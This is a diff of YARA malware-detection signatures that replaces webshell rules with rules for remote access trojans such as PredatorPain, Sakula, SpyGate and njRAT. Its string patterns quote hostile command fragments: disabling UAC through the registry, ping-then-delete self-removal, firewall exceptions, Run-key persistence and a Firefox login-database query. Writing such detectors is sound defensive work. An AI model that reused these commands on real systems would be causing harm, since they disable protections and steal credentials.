-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7720-L7731"
+		description = "Detects PredatorPain RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "c6670179-871d-5a57-983b-d77354e2ede9"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/PredatorPain"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L674-L702"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "135fc50f85228691b401848caef3be9e"
-		logic_hash = "a1bfba9c24819f5c1574aa179d853a6cc2fcf58c7b9a14eeab2639248178549c"
+		logic_hash = "917234f83f891ad00bd83908c244818f517ea89cf7d8c81cfc3618b8386c1804"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
+		$string1 = "holderwb.txt" wide
+		$string3 = "There is a file attached to this email" wide
+		$string4 = "screens\\screenshot" wide
+		$string5 = "Disablelogger" wide
+		$string6 = "\\pidloc.txt" wide
+		$string7 = "clearie" wide
+		$string8 = "clearff" wide
+		$string9 = "emails should be sent to you shortly" wide
+		$string10 = "jagex_cache\\regPin" wide
+		$string11 = "open=Sys.exe" wide
+		$ver1 = "PredatorLogger" wide
+		$ver2 = "EncryptedCredentials" wide
+		$ver3 = "Predator Pain" wide
 
 	condition:
-		all of them
+		7 of ( $string* ) and any of ( $ver* )
 }
-rule SIGNATURE_BASE_R57Shell
+rule SIGNATURE_BASE_RAT_Punisher
 {
 	meta:
-		description = "Webshells Auto-generated - file r57shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1f1070e8-e82c-5cae-a64a-cd5028adae97"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7732-L7743"
+		description = "Detects Punisher RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "1e16b3c7-9656-5570-afa2-542367aa14d8"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Punisher"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L704-L726"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8023394542cddf8aee5dec6072ed02b5"
-		logic_hash = "40ff6bceb3f9bd95fbf5e75681fadadaa64243007e10fcc86bb909282b8161c5"
+		logic_hash = "9347b8053393c3537693273c44a2a2f095928b8bc0cdcf9365a6f060d66efeb5"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"
+		$a = "abccba"
+		$b = {5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73}
+		$c = {5C 00 73 00 63 00 2E 00 76 00 62 00 73}
+		$d = "SpyTheSpy" wide ascii
+		$e = "wireshark" wide
+		$f = "apateDNS" wide
+		$g = "abccbaDanabccb"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Bdcli100
+rule SIGNATURE_BASE_RAT_Pythorat
 {
 	meta:
-		description = "Webshells Auto-generated - file bdcli100.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c74e8822-9556-5596-a130-c6e0120d7103"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7744-L7756"
+		description = "Detects Python RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "fc98c513-1abf-5331-b351-f6182e5b19c5"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/PythoRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L728-L751"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b12163ac53789fb4f62e4f17a8c2e028"
-		logic_hash = "48c70413c71d5a84f8cea48c77935b7cc26d9e1348d7ab257de4540d69f0f817"
+		logic_hash = "8edcfb8f234ff225537d19343c75788ec2a25940e80042751eea3280a967e166"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s5 = "unable to connect to "
-		$s8 = "backdoor is corrupted on "
+		$a = "TKeylogger"
+		$b = "uFileTransfer"
+		$c = "TTDownload"
+		$d = "SETTINGS"
+		$e = "Unknown" wide
+		$f = "#@#@#"
+		$g = "PluginData"
+		$i = "OnPluginMessage"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop_Devpack_2005Red
+rule SIGNATURE_BASE_RAT_Qrat
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005Red.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "963effd9-f31d-5238-9419-b5dd11822e56"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7757-L7770"
+		description = "Detects QRAT"
+		author = "Kevin Breen @KevTheHermit"
+		id = "2ee645a3-1e01-513c-a636-098e445adeca"
+		date = "2015-01-08"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L753-L773"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
-		logic_hash = "716b6faa8d1216f592d63b658cdd65d7be0226bf746b5fdf1827bdf881562711"
+		logic_hash = "6d404153ca64b547885e4e4581205f5fc20faf86e8ab18002c5deedca2487225"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "jar"
 
 	strings:
-		$s0 = "scrollbar-darkshadow-color:#FF9DBB;"
-		$s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
-		$s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+		$a0 = "e-data"
+		$a1 = "quaverse/crypter"
+		$a2 = "Qrypt.class"
+		$a3 = "Jarizer.class"
+		$a4 = "URLConnection.class"
 
 	condition:
-		all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006X2
+rule SIGNATURE_BASE_RAT_Sakula : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file 2006X2.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7771-L7783"
+		description = "Detects Sakula v1.0 RAT"
+		author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings"
+		id = "4be3179c-3b91-56db-bba9-9ccc42066f96"
+		date = "2015-10-13"
+		modified = "2023-12-05"
+		reference = "http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L775-L817"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cc5bf9fc56d404ebbc492855393d7620"
-		logic_hash = "0df587ccaf41d11c6be90ef631ce8b21f95f08fa8f71e62463c378455b312f4a"
+		logic_hash = "ec4e16deb6f4a671ee665c81568e87dc9a1023328e1be242eae015c1e04cfcef"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s2 = "Powered By "
-		$s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
+		$s1 = "%d_of_%d_for_%s_on_%s"
+		$s2 = "/c ping 127.0.0.1 & del /q \"%s\""
+		$s3 = "=%s&type=%d"
+		$s4 = "?photoid="
+		$s5 = "iexplorer"
+		$s6 = "net start \"%s\""
+		$s7 = "cmd.exe /c rundll32 \"%s\""
+		$v1_1 = "MicroPlayerUpdate.exe"
+		$v1_2 = "CCPUpdate"
+		$v1_3 = { 81 3E 78 03 00 00 75 57  8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF  15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31  41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15  24 F0 40 00 E8 0F 09 00 }
+		$v1_4 = { 50 E8 CD FC FF FF 83 C4  04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE  FE FF FF E8 13 F5 FF FF }
+		$serial01 = { 31 06 2e 48 3e 01 06 b1 8c 98 2f 00 53 18 5c 36 }
+		$serial02 = { 01 a5 d9 59 95 19 b1 ba fc fa d0 e8 0b 6d 67 35 }
+		$serial03 = { 47 d5 d5 37 2b cb 15 62 b4 c9 f4 c2 bd f1 35 87 }
+		$serial04 = { 3a c1 0e 68 f1 ce 51 9e 84 dd cd 28 b1 1f a5 42 }
+		$opcodes1 = { 89 FF 55 89 E5 83 EC 20 A1 ?? ?? ?? 00 83 F8 00 }
+		$opcodes2 = { 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B }
+		$opcodes3 = { 8B 45 08 8D 0C 02 8A 01 84 C0 74 08 3C ?? 74 04 34 ?? 88 01 }
+		$opcodes4 = { 30 14 38 8D 0C 38 40 FE C2 3B C6 }
+		$opcodes5 = { 30 14 39 8D 04 39 41 FE C2 3B CE }
+		$fp1 = "Symantec Corporation" ascii wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and ( ( 3 of ( $s* ) and any of ( $v1_* ) ) or ( any of ( $serial0* ) ) or ( any of ( $opcodes* ) ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Rdrbs084
+rule SIGNATURE_BASE_RAT_Shadowtech : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file rdrbs084.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "97548273-6894-5c9f-8cca-d966ce770ada"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7784-L7796"
+		description = "Detects ShadowTech RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "1fb15030-b400-5e70-b183-81e2527d5556"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/ShadowTech"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L819-L839"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ed30327b255816bdd7590bf891aa0020"
-		logic_hash = "8a743d62723c4a5f863f986edd4b149728680b40d6a4b9a99b093d62ccb70cf8"
+		logic_hash = "8ab024ae5ca62de30daf4392db5241220fcdb9b419bad555a996729aed9fa45d"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 83
+		tags = "FILE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "Create mapped port. You have to specify domain when using HTTP type."
-		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
+		$a = "ShadowTech" nocase
+		$b = "DownloadContainer"
+		$c = "MySettings"
+		$d = "System.Configuration"
+		$newline = "#-@NewLine@-#" wide
+		$split = "pSIL" wide
+		$key = "ESIL" wide
 
 	condition:
-		all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Hytop_Caseswitch_2005
+rule SIGNATURE_BASE_RAT_Smallnet
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0f2b8e71-1c11-5efe-bee7-146168aec369"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7797-L7815"
+		description = "Detects SmallNet RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "aec1f8fd-2806-527e-9d50-422f212864de"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/SmallNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L841-L861"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8bf667ee9e21366bc0bd3491cb614f41"
-		logic_hash = "0ecf28b5abb918cd1d8f38b76019dddf19dff5dbb114f16ef6ec9b46cb590a46"
+		logic_hash = "17a6be371ce0c616cfea0b42a30e6d9118376912002d59790b133c73fd5436a3"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "MSComDlg.CommonDialog"
-		$s2 = "CommonDialog1"
-		$s3 = "__vbaExceptHandler"
-		$s4 = "EVENT_SINK_Release"
-		$s5 = "EVENT_SINK_AddRef"
-		$s6 = "By Marcos"
-		$s7 = "EVENT_SINK_QueryInterface"
-		$s8 = "MethCallEngine"
+		$split1 = "!!<3SAFIA<3!!"
+		$split2 = "!!ElMattadorDz!!"
+		$a1 = "stub_2.Properties"
+		$a2 = "stub.exe" wide
+		$a3 = "get_CurrentDomain"
 
 	condition:
-		all of them
+		($split1 or $split2 ) and ( all of ( $a* ) )
 }
-rule SIGNATURE_BASE_Ebayid_Index3
+rule SIGNATURE_BASE_RAT_Spygate
 {
 	meta:
-		description = "Webshells Auto-generated - file index3.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4fc30150-7b44-53c4-888c-faf651495407"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7816-L7827"
+		description = "Detects SpyGate RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "ed015770-81ff-5d9c-8bd0-3c225e400724"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/SpyGate"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L863-L890"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0412b1e37f41ea0d002e4ed11608905f"
-		logic_hash = "47660cb71d6787683e51aa14fc0f4a9d6f1c59517b77bfe4135098a0020ded11"
+		logic_hash = "5b891212f3a669c6066cfddef418faafd75c92bb2f1e8e1f48403422a73bc9fa"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
+		$split = "abccba"
+		$a1 = "abccbaSpyGateRATabccba"
+		$a2 = "StubX.pdb"
+		$a3 = "abccbaDanabccb"
+		$b1 = "monikerString" nocase
+		$b2 = "virustotal1"
+		$b3 = "get_CurrentDomain"
+		$c1 = "shutdowncomputer" wide
+		$c2 = "shutdown -r -t 00" wide
+		$c3 = "set cdaudio door closed" wide
+		$c4 = "FileManagerSplit" wide
+		$c5 = "Chating With >> [~Hacker~]" wide
 
 	condition:
-		all of them
+		( all of ( $a* ) and #split > 40 ) or ( all of ( $b* ) and #split > 10 ) or ( all of ( $c* ) )
 }
-rule SIGNATURE_BASE_FSO_S_Phvayv
+rule SIGNATURE_BASE_RAT_Sub7Nation
 {
 	meta:
-		description = "Webshells Auto-generated - file phvayv.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "07e027a6-01a5-5250-a35e-fbfef1449cfe"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7828-L7839"
+		description = "Detects Sub7Nation RAT"
+		author = "Kevin Breen <kevin@techanarchy.net> (slightly modified by Florian Roth to improve performance)"
+		id = "4f41d649-4a90-566b-bda8-0a288380aeaa"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Sub7Nation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L892-L913"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "205ecda66c443083403efb1e5c7f7878"
-		logic_hash = "d0482607f7d9cf6c89963cb9b1f943fa0b80636e857e0fb044cd9a0b3f974deb"
+		logic_hash = "bd6c423cd5cb5a86b20e5e65ab460904548b8814c92ac65e497757bb79a27681"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
+		$a = "EnableLUA /t REG_DWORD /d 0 /f"
+		$i = "HostSettings"
+		$verSpecific1 = "sevane.tmp"
+		$verSpecific2 = "cmd_.bat"
+		$verSpecific3 = "a2b7c3d7e4"
+		$verSpecific4 = "cmd.dll"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Byshell063_Ntboot
+rule SIGNATURE_BASE_RAT_Vertex
 {
 	meta:
-		description = "Webshells Auto-generated - file ntboot.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7d1f39f6-04f1-51ee-b125-c35af8ae4c0c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7840-L7854"
+		description = "Detects Vertex RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "f6f5967e-6b88-5d95-8fe1-a286ee8ce64c"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Vertex"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L915-L938"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
-		logic_hash = "2fdc930eacb87d02ebe69a2b64df4103bd0f3417a76f1b2922b3d4cd4c0dffe9"
+		logic_hash = "c9fb0dedd97240ad29924865118ba34f5d79dbefbb13729d96d41336ec4de39e"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
-		$s1 = "Failure ... Access is Denied !"
-		$s2 = "Dumping Description to Registry..."
-		$s3 = "Opening Service .... Failure !"
+		$string1 = "DEFPATH"
+		$string2 = "HKNAME"
+		$string3 = "HPORT"
+		$string4 = "INSTALL"
+		$string5 = "IPATH"
+		$string6 = "MUTEX"
+		$res1 = "PANELPATH"
+		$res2 = "ROOTURL"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Casus15_2
+rule SIGNATURE_BASE_RAT_Virusrat
 {
 	meta:
-		description = "Webshells Auto-generated - file casus15.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d3f67fe9-a93f-504a-8b14-a815135d562f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7855-L7866"
+		description = "Detects VirusRAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "ef00cec9-d09b-5010-8e7d-bb391c937f34"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/VirusRat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L940-L967"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8d155b4239d922367af5d0a1b89533a3"
-		logic_hash = "45820e0398cca8e75fc4acf6863d962a817afd95a4592acd4ac4a50029684220"
+		logic_hash = "8540296fe1341a793377494cec9ba6ee0313203bee9997f0da0b692959727c59"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "copy ( $dosya_gonder"
+		$string0 = "virustotal"
+		$string1 = "virusscan"
+		$string2 = "abccba"
+		$string3 = "pronoip"
+		$string4 = "streamWebcam"
+		$string5 = "DOMAIN_PASSWORD"
+		$string6 = "Stub.Form1.resources"
+		$string7 = "ftp://{0}@{1}" wide
+		$string8 = "SELECT * FROM moz_logins" wide
+		$string9 = "SELECT * FROM moz_disabledHosts" wide
+		$string10 = "DynDNS\\Updater\\config.dyndns" wide
+		$string11 = "|BawaneH|" wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Installer
+rule SIGNATURE_BASE_RAT_Xtreme
 {
 	meta:
-		description = "Webshells Auto-generated - file installer.cmd"
-		author = "Florian Roth (Nextron Systems)"
-		id = "681d8284-55e5-5316-a0d2-f4f13218df76"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7867-L7879"
+		description = "Detects Xtreme RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "02b7bb6a-5d1e-5379-b366-868680844719"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Xtreme"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L969-L990"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a507919ae701cf7e42fa441d3ad95f8f"
-		logic_hash = "73c1032313155ceb752fe2f94c8d242833127fe0443d7e3044fa1de2b2b7742b"
+		logic_hash = "4dec8de6609f8229444291a78e920ac48b9b5751dd0cad7c95bc6529d6f8c16c"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+		ver = "2.9, 3.1, 3.2, 3.5"
 
 	strings:
-		$s0 = "Restore Old Vanquish"
-		$s4 = "ReInstall Vanquish"
+		$a = "XTREME" wide
+		$b = "ServerStarted" wide
+		$c = "XtremeKeylogger" wide
+		$d = "x.html" wide
+		$e = "Xtreme RAT" wide
 
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_FSO_S_Remview_2
-{
-	meta:
-		description = "Webshells Auto-generated - file remview.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8e0492e8-d683-5c2d-b1ce-6c8344b874af"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7880-L7892"
+	condition:
+		all of them
+}
+rule SIGNATURE_BASE_RAT_Adwind
+{
+	meta:
+		description = "Detects Adwind RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "95681c07-0e9c-5688-a8a0-899617521c7b"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/adWind"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L992-L1011"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b4a09911a5b23e00b55abe546ded691c"
-		logic_hash = "0a682431f7044e9a49c8dd4842a22c521e2a07d5df045b0a12449e3b3206716b"
+		logic_hash = "11167b927fa06324950753c6ec8f28058f2aa66fb4ecdf66a21de11a8db190b8"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "<xmp>$out</"
-		$s1 = ".mm(\"Eval PHP code\")."
+		$meta = "META-INF"
+		$conf = "config.xml"
+		$a = "Adwind.class"
+		$b = "Principal.adwind"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_R57
+rule SIGNATURE_BASE_RAT_Njrat
 {
 	meta:
-		description = "Webshells Auto-generated - file r57.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "14092413-27a4-5b7d-9023-0b53b3d45a12"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7893-L7904"
+		description = "Detects njRAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "6289b9c8-eef6-5cfb-97bd-b819158d6fdd"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/njRat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L1013-L1036"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "903908b77a266b855262cdbce81c3f72"
-		logic_hash = "8d0f3b2009594d4aa413c4794dca12e3c66a19974cc6d0b47cc3f5e2572a4c57"
+		logic_hash = "47e8cc71caaefd70a170eb8fc845cb7ddb8df04b90163fe35f1ccb9a3f614c57"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
+		$s1 = {7C 00 27 00 7C 00 27 00 7C}
+		$s2 = "netsh firewall add allowedprogram" wide
+		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s4 = "yyyy-MM-dd" wide
+		$v1 = "cmd.exe /k ping 0 & del" wide
+		$v2 = "cmd.exe /c ping 127.0.0.1 & del" wide
+		$v3 = "cmd.exe /c ping 0 -n 2 & del" wide
 
 	condition:
-		all of them
+		all of ( $s* ) and any of ( $v* )
 }
-rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006X
+rule SIGNATURE_BASE_RAT_Unrecom
 {
 	meta:
-		description = "Webshells Auto-generated - file 2006X.exe"
